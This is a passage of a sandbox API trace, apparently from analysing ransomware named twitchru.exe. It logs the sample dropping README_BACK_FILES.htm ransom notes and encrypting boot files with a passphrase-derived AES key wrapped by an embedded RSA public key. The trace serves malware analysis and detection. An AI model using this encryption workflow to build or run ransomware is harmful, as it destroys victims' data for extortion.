lpData="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe") returned 0x0 [0125.777] RegCloseKey (hKey=0x5cd4) returned 0x0 [0125.777] SleepConditionVariableSRW (in: ConditionVariable=0x66493c, SRWLock=0x5b1678, dwMilliseconds=0xffffffff, Flags=0x0 | out: ConditionVariable=0x66493c, SRWLock=0x5b1678) returned 1 [0125.780] GetCurrentThreadId () returned 0x658 [0125.780] WaitForSingleObjectEx (hHandle=0x5cd4, dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 10 os_tid = 0xc8c Thread: id = 11 os_tid = 0xc90 Thread: id = 21 os_tid = 0xd10 [0125.779] GetLastError () returned 0x57 [0125.779] SetLastError (dwErrCode=0x57) [0125.779] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x77c30000 [0125.780] GetProcAddress (hModule=0x77c30000, lpProcName="AppPolicyGetThreadInitializationType") returned 0x0 [0125.780] GetCurrentThreadId () returned 0xd10 [0125.780] GetCurrentThreadId () returned 0xd10 [0125.780] RtlWakeConditionVariable (in: ConditionVariable=0x66493c | out: ConditionVariable=0x66493c) [0125.780] FindFirstFileA (in: lpFileName="C:\\\\*.*", lpFindFileData=0x2c5fc34 | out: lpFindFileData=0x2c5fc34) returned 0x69d8a8 [0125.780] FindFirstFileA (in: lpFileName="C:\\\\$Recycle.Bin\\*.*", lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 0x69d7e8 [0125.781] FindNextFileA (in: hFindFile=0x69d7e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0125.781] FindNextFileA (in: hFindFile=0x69d7e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0125.781] FindFirstFileA (in: lpFileName="C:\\\\$Recycle.Bin\\S-1-5-18\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d9e8 [0125.782] FindNextFileA (in: hFindFile=0x69d9e8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0125.782] FindNextFileA (in: hFindFile=0x69d9e8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0125.782] FindNextFileA (in: hFindFile=0x69d9e8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0125.782] FindClose (in: hFindFile=0x69d9e8 | out: hFindFile=0x69d9e8) returned 1 [0125.782] GetFileAttributesA (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-18\\README_BACK_FILES.htm" (normalized: "c:\\$recycle.bin\\s-1-5-18\\readme_back_files.htm")) returned 0xffffffff [0125.782] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x75260000 [0125.782] GetProcAddress (hModule=0x75260000, lpProcName="AreFileApisANSI") returned 0x7527f9b0 [0125.783] LoadLibraryExW (lpLibFileName="api-ms-win-core-string-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x74e70000 [0125.783] GetProcAddress (hModule=0x74e70000, lpProcName="CompareStringEx") returned 0x74f14500 [0125.783] GetProcAddress (hModule=0x74e70000, lpProcName="EnumSystemLocalesEx") returned 0x74f2e350 [0125.783] LoadLibraryExW (lpLibFileName="api-ms-win-core-datetime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x74e70000 [0125.783] GetProcAddress (hModule=0x74e70000, lpProcName="GetDateFormatEx") returned 0x74f7b710 [0125.783] GetProcAddress (hModule=0x74e70000, lpProcName="GetLocaleInfoEx") returned 0x74f0d3f0 [0125.783] GetProcAddress (hModule=0x74e70000, lpProcName="GetTimeFormatEx") returned 0x74f7b9e0 [0125.784] GetProcAddress (hModule=0x74e70000, lpProcName="GetUserDefaultLocaleName") returned 0x74f22510 [0125.784] GetProcAddress (hModule=0x74e70000, lpProcName="IsValidLocaleName") returned 0x74f0c210 [0125.784] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-obsolete-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x74e70000 [0125.784] GetProcAddress (hModule=0x74e70000, lpProcName="LCIDToLocaleName") returned 0x74f204a0 [0125.784] GetProcAddress (hModule=0x74e70000, lpProcName="LocaleNameToLCID") returned 0x74f264c0 [0125.784] GetLastError () returned 0x2 [0125.784] SetLastError (dwErrCode=0x2) [0125.784] GetLastError () returned 0x2 [0125.784] SetLastError (dwErrCode=0x2) [0125.785] GetLastError () returned 0x2 [0125.785] SetLastError (dwErrCode=0x2) [0125.785] GetLastError () returned 0x2 [0125.785] SetLastError (dwErrCode=0x2) [0125.785] GetLastError () returned 0x2 [0125.785] SetLastError (dwErrCode=0x2) [0125.785] GetLastError () returned 0x2 [0125.785] SetLastError (dwErrCode=0x2) [0125.785] GetLastError () returned 0x2 [0125.785] SetLastError (dwErrCode=0x2) [0125.785] GetLastError () returned 0x2 [0125.785] SetLastError (dwErrCode=0x2) [0125.785] GetLastError () returned 0x2 [0125.785] SetLastError (dwErrCode=0x2) [0125.785] GetLastError () returned 0x2 [0125.785] SetLastError (dwErrCode=0x2) [0125.785] GetLastError () returned 0x2 [0125.785] SetLastError (dwErrCode=0x2) [0125.785] GetLastError () returned 0x2 [0125.785] SetLastError (dwErrCode=0x2) [0125.785] GetLastError () returned 0x2 [0125.786] SetLastError (dwErrCode=0x2) [0125.786] GetLastError () returned 0x2 [0125.786] SetLastError (dwErrCode=0x2) [0125.786] AreFileApisANSI () returned 1 [0125.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5b16a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0125.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5b16a8, cbMultiByte=-1, lpWideCharStr=0x5c61e8, cchWideChar=48 | out: lpWideCharStr="C:\\\\$Recycle.Bin\\S-1-5-18\\README_BACK_FILES.htm") returned 48 [0125.786] CreateFileW (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-18\\README_BACK_FILES.htm" (normalized: "c:\\$recycle.bin\\s-1-5-18\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0125.788] GetFileType (hFile=0x5cd8) returned 0x1 [0125.788] GetLastError () returned 0x0 [0125.788] SetLastError (dwErrCode=0x0) [0125.788] GetLastError () returned 0x0 [0125.788] SetLastError (dwErrCode=0x0) [0125.788] GetLastError () returned 0x0 [0125.788] SetLastError (dwErrCode=0x0) [0125.788] GetLastError () returned 0x0 [0125.788] SetLastError (dwErrCode=0x0) [0125.788] GetLastError () returned 0x0 [0125.788] SetLastError (dwErrCode=0x0) [0125.788] GetLastError () returned 0x0 [0125.788] SetLastError (dwErrCode=0x0) [0125.788] GetLastError () returned 0x0 [0125.788] SetLastError (dwErrCode=0x0) [0125.789] GetLastError () returned 0x0 [0125.789] SetLastError (dwErrCode=0x0) [0125.789] GetLastError () returned 0x0 [0125.789] SetLastError (dwErrCode=0x0) [0125.789] GetLastError () returned 0x0 [0125.789] SetLastError (dwErrCode=0x0) [0125.789] GetLastError () returned 0x0 [0125.789] SetLastError (dwErrCode=0x0) [0125.789] GetLastError () returned 0x0 [0125.789] GetProcAddress (hModule=0x74e70000, lpProcName="FlsGetValue") returned 0x74f1a7b0 [0125.789] SetLastError (dwErrCode=0x0) [0125.789] GetLastError () returned 0x0 [0125.790] SetLastError (dwErrCode=0x0) [0125.790] WriteFile (in: hFile=0x5cd8, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0125.791] CloseHandle (hObject=0x5cd8) returned 1 [0125.850] FindNextFileA (in: hFindFile=0x69d7e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0125.851] FindFirstFileA (in: lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d268 [0125.852] FindNextFileA (in: hFindFile=0x69d268, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0125.852] FindNextFileA (in: hFindFile=0x69d268, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0125.852] FindNextFileA (in: hFindFile=0x69d268, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0125.852] FindClose (in: hFindFile=0x69d268 | out: hFindFile=0x69d268) returned 1 [0125.853] GetFileAttributesA (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\README_BACK_FILES.htm" (normalized: "c:\\$recycle.bin\\s-1-5-21-1462094071-1423818996-289466292-1000\\readme_back_files.htm")) returned 0xffffffff [0125.854] AreFileApisANSI () returned 1 [0125.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5c61e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0125.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5c61e8, cbMultiByte=-1, lpWideCharStr=0x5b00c8, cchWideChar=85 | out: lpWideCharStr="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\README_BACK_FILES.htm") returned 85 [0125.854] CreateFileW (lpFileName="C:\\\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\README_BACK_FILES.htm" (normalized: "c:\\$recycle.bin\\s-1-5-21-1462094071-1423818996-289466292-1000\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0125.855] GetFileType (hFile=0x5cd8) returned 0x1 [0125.856] GetLastError () returned 0x0 [0125.856] SetLastError (dwErrCode=0x0) [0125.856] GetLastError () returned 0x0 [0125.856] SetLastError (dwErrCode=0x0) [0125.857] WriteFile (in: hFile=0x5cd8, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0125.859] CloseHandle (hObject=0x5cd8) returned 1 [0125.859] FindNextFileA (in: hFindFile=0x69d7e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 0 [0125.859] FindClose (in: hFindFile=0x69d7e8 | out: hFindFile=0x69d7e8) returned 1 [0125.860] GetFileAttributesA (lpFileName="C:\\\\$Recycle.Bin\\README_BACK_FILES.htm" (normalized: "c:\\$recycle.bin\\readme_back_files.htm")) returned 0xffffffff [0125.860] AreFileApisANSI () returned 1 [0125.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5b1670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0125.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5b1670, cbMultiByte=-1, lpWideCharStr=0x5c5210, cchWideChar=39 | out: lpWideCharStr="C:\\\\$Recycle.Bin\\README_BACK_FILES.htm") returned 39 [0125.860] CreateFileW (lpFileName="C:\\\\$Recycle.Bin\\README_BACK_FILES.htm" (normalized: "c:\\$recycle.bin\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5fa1c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cdc [0125.861] GetFileType (hFile=0x5cdc) returned 0x1 [0125.862] GetLastError () returned 0x0 [0125.862] SetLastError (dwErrCode=0x0) [0125.862] GetLastError () returned 0x0 [0125.862] SetLastError (dwErrCode=0x0) [0125.862] WriteFile (in: hFile=0x5cdc, lpBuffer=0x2c5e668*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e660, lpOverlapped=0x0 | out: lpBuffer=0x2c5e668*, lpNumberOfBytesWritten=0x2c5e660*=0x5ec, lpOverlapped=0x0) returned 1 [0125.864] CloseHandle (hObject=0x5cdc) returned 1 [0125.865] FindNextFileA (in: hFindFile=0x69d8a8, lpFindFileData=0x2c5fc34 | out: lpFindFileData=0x2c5fc34) returned 1 [0125.865] FindFirstFileA (in: lpFileName="C:\\\\Boot\\*.*", lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 0x69d8e8 [0125.865] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0125.867] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0125.867] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0125.867] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f7a8 | out: lpSystemTimeAsFileTime=0x2c5f7a8) [0125.867] GetLastError () returned 0x0 [0125.867] SetLastError (dwErrCode=0x0) [0125.867] GetLastError () returned 0x0 [0125.867] SetLastError (dwErrCode=0x0) [0125.867] GetLastError () returned 0x0 [0125.868] SetLastError (dwErrCode=0x0) [0125.868] GetLastError () returned 0x0 [0125.868] SetLastError (dwErrCode=0x0) [0125.868] GetLastError () returned 0x0 [0125.868] SetLastError (dwErrCode=0x0) [0125.868] GetLastError () returned 0x0 [0125.868] SetLastError (dwErrCode=0x0) [0125.868] GetLastError () returned 0x0 [0125.868] SetLastError (dwErrCode=0x0) [0125.868] GetLastError () returned 0x0 [0125.869] SetLastError (dwErrCode=0x0) [0125.869] GetLastError () returned 0x0 [0125.869] SetLastError (dwErrCode=0x0) [0125.869] GetLastError () returned 0x0 [0125.869] SetLastError (dwErrCode=0x0) [0125.869] GetLastError () returned 0x0 [0125.869] SetLastError (dwErrCode=0x0) [0125.869] GetLastError () returned 0x0 [0125.869] SetLastError (dwErrCode=0x0) [0125.869] GetLastError () returned 0x0 [0125.869] SetLastError (dwErrCode=0x0) [0125.869] GetLastError () returned 0x0 [0125.869] SetLastError (dwErrCode=0x0) [0125.869] GetLastError () returned 0x0 [0125.869] SetLastError (dwErrCode=0x0) [0125.869] GetLastError () returned 0x0 [0125.869] SetLastError (dwErrCode=0x0) [0125.869] GetLastError () returned 0x0 [0125.870] SetLastError (dwErrCode=0x0) [0125.870] GetLastError () returned 0x0 [0125.870] SetLastError (dwErrCode=0x0) [0125.870] GetLastError () returned 0x0 [0125.870] SetLastError (dwErrCode=0x0) [0125.870] GetLastError () returned 0x0 [0125.870] SetLastError (dwErrCode=0x0) [0125.870] GetLastError () returned 0x0 [0125.870] SetLastError (dwErrCode=0x0) [0125.870] GetLastError () returned 0x0 [0125.870] SetLastError (dwErrCode=0x0) [0125.870] GetLastError () returned 0x0 [0125.870] SetLastError (dwErrCode=0x0) [0125.870] GetLastError () returned 0x0 [0125.870] SetLastError (dwErrCode=0x0) [0125.870] GetLastError () returned 0x0 [0125.870] SetLastError (dwErrCode=0x0) [0125.871] GetFileAttributesA (lpFileName="C:\\\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log")) returned 0x26 [0125.871] SetFileAttributesA (lpFileName="C:\\\\Boot\\BCD.LOG", dwFileAttributes=0x80) returned 1 [0125.872] CreateFileA (lpFileName="C:\\\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0125.872] CreateFileA (lpFileName="C:\\\\Boot\\BCD.LOG.gsg" (normalized: "c:\\boot\\bcd.log.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0125.876] SetFileAttributesA (lpFileName="C:\\\\Boot\\BCD.LOG.gsg", dwFileAttributes=0x2) returned 1 [0125.876] CryptAcquireContextA (in: phProv=0x2c5e7a4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e7a4*=0x5b00c8) returned 1 [0126.178] CryptCreateHash (in: hProv=0x5b00c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e7a8 | out: phHash=0x2c5e7a8) returned 1 [0126.178] lstrlenA (lpString="swVGAbWiEnRNHPeSGjNvHnzlzMlQm") returned 29 [0126.178] CryptHashData (hHash=0x69d5e8, pbData=0x5bcdb8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.178] CryptDeriveKey (in: hProv=0x5b00c8, Algid=0x6610, hBaseData=0x69d5e8, dwFlags=0x1000000, phKey=0x2c5e794 | out: phKey=0x2c5e794*=0x69d968) returned 1 [0126.179] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e7b0, pcbBinary=0x2c5e790, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e7b0, pcbBinary=0x2c5e790, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.179] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e7b0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e784, pcbStructInfo=0x2c5e78c | out: pvStructInfo=0x2c5e784, pcbStructInfo=0x2c5e78c) returned 1 [0126.180] CryptAcquireContextA (in: phProv=0x2c5e7a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e7a0*=0x6660c8) returned 1 [0126.181] CryptImportPublicKeyInfo (in: hCryptProv=0x6660c8, dwCertEncodingType=0x1, pInfo=0x5ba638*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x5ba668*, PublicKey.cbData=0x8c, PublicKey.pbData=0x5ba670*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e798 | out: phKey=0x2c5e798*=0x69d268) returned 1 [0126.182] CryptEncrypt (in: hKey=0x69d268, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e788*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e788*=0x80) returned 1 [0126.183] CryptEncrypt (in: hKey=0x69d268, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2863a10*, pdwDataLen=0x2c5e79c*=0x18, dwBufLen=0x80 | out: pbData=0x2863a10*, pdwDataLen=0x2c5e79c*=0x80) returned 1 [0126.183] WriteFile (in: hFile=0x5cd8, lpBuffer=0x2863a10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2863a10*, lpNumberOfBytesWritten=0x2c5e7ac*=0x80, lpOverlapped=0x0) returned 1 [0126.184] ReadFile (in: hFile=0xffffffff, lpBuffer=0x66d940, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x66d940, lpNumberOfBytesRead=0x2c5e7ac*=0x0, lpOverlapped=0x0) returned 0 [0126.184] CryptEncrypt (in: hKey=0x69d968, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x66d940*, pdwDataLen=0x2c5e7ac*=0x0, dwBufLen=0x400 | out: pbData=0x66d940*, pdwDataLen=0x2c5e7ac*=0x10) returned 1 [0126.184] WriteFile (in: hFile=0x5cd8, lpBuffer=0x66d940*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x66d940*, lpNumberOfBytesWritten=0x2c5e7ac*=0x10, lpOverlapped=0x0) returned 1 [0126.184] CloseHandle (hObject=0xffffffff) returned 1 [0126.184] CloseHandle (hObject=0x5cd8) returned 1 [0126.185] CopyFileA (lpExistingFileName="C:\\\\Boot\\BCD.LOG.gsg" (normalized: "c:\\boot\\bcd.log.gsg"), lpNewFileName="C:\\\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), bFailIfExists=0) returned 0 [0126.187] SetFileAttributesA (lpFileName="C:\\\\Boot\\BCD.LOG", dwFileAttributes=0x4) returned 1 [0126.187] DeleteFileA (lpFileName="C:\\\\Boot\\BCD.LOG.gsg" (normalized: "c:\\boot\\bcd.log.gsg")) returned 1 [0126.188] MoveFileA (lpExistingFileName="C:\\\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), lpNewFileName="C:\\\\Boot\\BCD.LOG.fuck" (normalized: "c:\\boot\\bcd.log.fuck")) returned 0 [0126.188] CryptDestroyHash (hHash=0x69d5e8) returned 1 [0126.188] CryptDestroyKey (hKey=0x69d968) returned 1 [0126.188] CryptReleaseContext (hProv=0x5b00c8, dwFlags=0x0) returned 1 [0126.189] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0126.189] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0126.189] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0126.189] FindFirstFileA (in: lpFileName="C:\\\\Boot\\bg-BG\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d968 [0126.189] FindNextFileA (in: hFindFile=0x69d968, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.189] FindNextFileA (in: hFindFile=0x69d968, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0126.189] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.190] SetLastError (dwErrCode=0x20) [0126.190] GetLastError () returned 0x20 [0126.191] SetLastError (dwErrCode=0x20) [0126.191] GetLastError () returned 0x20 [0126.191] SetLastError (dwErrCode=0x20) [0126.191] GetLastError () returned 0x20 [0126.191] SetLastError (dwErrCode=0x20) [0126.191] GetLastError () returned 0x20 [0126.191] SetLastError (dwErrCode=0x20) [0126.191] GetLastError () returned 0x20 [0126.191] SetLastError (dwErrCode=0x20) [0126.191] GetLastError () returned 0x20 [0126.191] SetLastError (dwErrCode=0x20) [0126.191] GetFileAttributesA (lpFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui")) returned 0x20 [0126.191] SetFileAttributesA (lpFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0126.191] CreateFileA (lpFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0126.191] CreateFileA (lpFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cec [0126.192] SetFileAttributesA (lpFileName="C:\\\\Boot\\bg-BG\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0126.192] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x5b00c8) returned 1 [0126.194] CryptCreateHash (in: hProv=0x5b00c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0126.194] lstrlenA (lpString="swVGAbWiEnRNHPeSGjNvHnzlzMlQm") returned 29 [0126.194] CryptHashData (hHash=0x69d768, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0126.194] CryptDeriveKey (in: hProv=0x5b00c8, Algid=0x6610, hBaseData=0x69d768, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d6e8) returned 1 [0126.194] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.194] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0126.194] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x666030) returned 1 [0126.194] CryptImportPublicKeyInfo (in: hCryptProv=0x666030, dwCertEncodingType=0x1, pInfo=0x5ba3c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x5ba3f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x5ba400*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69d2a8) returned 1 [0126.194] CryptEncrypt (in: hKey=0x69d2a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0126.194] CryptEncrypt (in: hKey=0x69d2a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2863418*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2863418*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0126.194] WriteFile (in: hFile=0x5cec, lpBuffer=0x2863418*, 